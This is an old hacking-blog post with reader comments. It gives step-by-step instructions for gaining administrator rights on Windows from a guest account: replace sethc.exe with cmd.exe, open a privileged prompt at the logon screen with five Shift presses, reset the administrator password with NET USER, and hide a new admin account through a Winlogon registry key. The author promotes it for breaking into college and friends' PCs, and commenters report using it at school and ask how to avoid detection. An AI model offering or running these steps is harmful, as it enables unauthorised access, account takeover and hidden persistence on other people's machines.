Hack administrator from Guest account.

Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the  administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…

Concept

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Here is how to do that -

  • Go to C:/windows/system32
  • Copy cmd.exe and paste it on desktop
  • rename cmd.exe to sethc.exe
  • Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

When asked to overwrite,overwrite the sethc.exe - rdhacker.blogspot.com

  • Now Log out from your guest account and at the user select window,press shift key 5 times.
  • Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

Press shift key 5 times and command prompt will open - rdhacker.blogspot.com

  • Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
  • You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
  • Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)

I hope that was informative..


Posted by XERO.ALL RIGHTS RESERVED.

 

22 Responses to “Hack administrator from Guest account.”

Punit said...
February 5, 2009 at 11:13 AM

gr8 one.

u even dont need to change the admin password.
type "explorer" at the command prompt and the windows will start with full administrator privileges.


X.E.R.O said...
February 5, 2009 at 6:19 PM

Hi Punit
Thanks for your feedback and for a noteworthy tip worth including in the bag of tricks. I hope your stay at Prohack will be as enjoyable as it can get.

Thanks and keep learning

X.E.R.O


Genesis said...
February 7, 2009 at 11:27 AM

Hey, that doesn't work on my computer.
when i tried to copy the new sythe.exe to system32, window required me to enter the administrator account's password. how can i get around that?


X.E.R.O said...
February 7, 2009 at 6:24 PM

Hi Genesis
Thanks for giving my blog a read.As I already stated that for this you will need a Guest account with write access to system 32.Or You can try the Boot cds wbout whom I will be posting an article soon.
Cheers

X.E.R.O


Yusuf said...
February 12, 2009 at 11:44 AM

dosent work..the same old sticky key dialog comes up..even after Overwriting the sethc.exe


albinoferret said...
April 10, 2009 at 12:17 PM

I LOVE YOU!!!!! <3


X.E.R.O said...
April 10, 2009 at 11:32 PM

Hey Albino
Thanks a lot for the terrific response bro :)

CIAO :P


José said...
October 19, 2009 at 9:14 PM

I don't think that is a WOW Hack, cause' if your user was from USER's Group, Your won't replace that executable.....

Then, in your example, the user that replace the executable is a administrator user too...


:S so bad


X.E.R.O said...
October 19, 2009 at 9:55 PM

@Jose
Lemme correct you at 2 places-
1> This hack was done using a user account.This hack works on 30% on windows installations which are unconfigured using cacls commands,which i found at the time of writing were quite dominant in my college campus.

2> u are right,most of xp systems today donot allow to replace the system32 files,but then all the hacks which work on active windows like the screensaver hack and startup one, will fail to work,it will only work when the condition 1 becomes true.Then the only way to bypass a windows password will be to use a bootable disc solution to my knowledge.

In that case i keep my usb drive ready.

Cheers

XERO


Saiy said...
December 31, 2009 at 6:04 AM

Dude ! I was looking for this hack !! thanks a lot buddy :)


Anonymous said...
May 11, 2010 at 9:41 PM

i did it in my college, it worked and i thank you for it. what an idea sir jee!


indambee said...
April 12, 2011 at 5:57 PM

I want to ask something. :)
Well... from this tut I saw that now guest has admin privilleges. But what about the original admin account? It is still admin?
(what I am trying to say : there will be 2accounts with admin privilleges ??? )


Braden said...
April 22, 2011 at 5:35 AM

hhhhhh. i cant get it to work. it wont let me copy sethc into System32. HELP!!!


Ryan said...
May 1, 2011 at 4:02 AM

In order to replace "sethc" with "cmd" I need administrator privilages can you help me out? also on the off chance I get the adimin to put in that password, is there any command that can turn my current user account into an admin privilages one instead of making a new one? The admin's not dumb enough to the point of where they won't suspect their password not working or a brand new user :P


Arman said...
May 6, 2011 at 1:06 AM

I tried a way like this, but the victim pc didn't have guest account so i had to after 5 time press shift... in cmd mode replaced with sethc .
after reboot do this things that you said...
BUT you can't do this action if the admin name had " " space besides the words, for exam: admin name: theprokack 888 kcakorprht

do you have any idea about that?
at the end i should say sorry because i know English little. I trying to learn it!
I'll be happy if you answer me...

thanks
http://ArmanRezakhani.com


Vvsprasad said...
May 7, 2011 at 4:15 PM

its not working while pasting file it says access denied


Teen with mean ass dad said...
May 8, 2011 at 4:11 AM

Hey i have dont everything fine up till the last step where i get an error trying to switch the command sethc with the sticky keys one... any tips?


Anonymous said...
December 14, 2011 at 6:34 AM

how can i hack when the computer was in deep freeze mode


Anonymous said...
May 17, 2012 at 3:31 AM

It didn't work at my school.
Unable TO access System 32


Anonymous said...
October 9, 2012 at 7:39 PM

how to go to system32......sum body pls help me out


Ernest Ofori said...
February 25, 2013 at 8:54 AM

Hey can u make a video of this at YouTube. Will really help


Shimmy said...
March 6, 2013 at 9:13 AM

I have 2 problems #1 I cant rename sethc it asks me for permission from trustedinstaller #2 the admin name has a space so it doesnt go. Could any one help me?


Post a Comment

Need to say something ? Spell it out :)

All Rights Reserved by Pro Hack . Copyright 2008 - 20011. Template by Bloggermint .